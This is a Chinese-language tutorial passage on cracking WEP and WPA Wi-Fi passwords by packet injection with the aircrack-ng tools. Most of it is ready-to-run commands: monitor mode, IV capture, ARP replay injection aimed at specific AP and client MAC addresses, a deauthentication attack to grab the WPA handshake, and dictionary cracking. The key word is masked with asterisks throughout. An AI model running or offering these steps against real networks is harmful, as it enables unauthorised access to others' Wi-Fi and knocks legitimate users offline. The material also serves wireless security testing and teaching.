0x2: 数据包注入
Google上有很多"WEP密码**"、"WPA"、"WP2密码**"、也有很多自动化工具(如wifite、fern-wifi-cracker),它们**的原理就是数据包注入
使用Airodump-ng系列软件来进行无线数据包注入、密码**
1. WEP
通过静默捕获IVS数据包,或主动注入ARP数据包(这是一种数据帧),加快当前信道中的流量来加速**,最终的目的是捕获足够多的IVS数据包,从而利用RC4算法的缺陷来逆向出key
example:
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0
airodump-ng --ivs -w longas -c 6 mon0
//这个时候理论上可以等待抓包抓到足够数量就可以了,但是为了加快抓包速度,可以采用arp注入的方式来加快抓包
//重新打开一个新的console,然后执行arp注入命令
aireplay-ng -3 -b 08:10:77:CF:C9:62 -h CC:AF:78:26:77:BD mon0
//抓包结束后,确保抓到了足够熟练的IVs包,开始**
aircrack-ng longas-01.ivs
如果抓到的IVs包数量不够,会遇到**失败,最好能抓到2W以上的包数量
2. WPA
通过主动注入Deanthentication/Disassociation数据包(它们属于管理帧,试图告诉AP某个客户端想断开连接,显然这并不是这个客户端的本意),来强制断开目标客户端和AP的Wi-Fi,连接,当目标试图和AP进行重连接的时候,黑客捕获握手4次包(Handshak Package),然后利用离线字典、或者彩虹表进行暴力**
example:
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
//开始捕获无线数据包
airodump-ng --ivs -w longas -c 6 mon0
//另开一个console,进行Deauth攻击,为了捕获握手包
aireplay-ng -0 1 -a 08:10:77:CF:C9:62 -c CC:AF:78:26:77:BD mon0
//在右上角看到了 WPA handshake提示后,表示抓到了握手包,开始**WPA-PSK
aircrack-ng -w /pentest/passwords/wordlists/test.lst longas-01.ivs |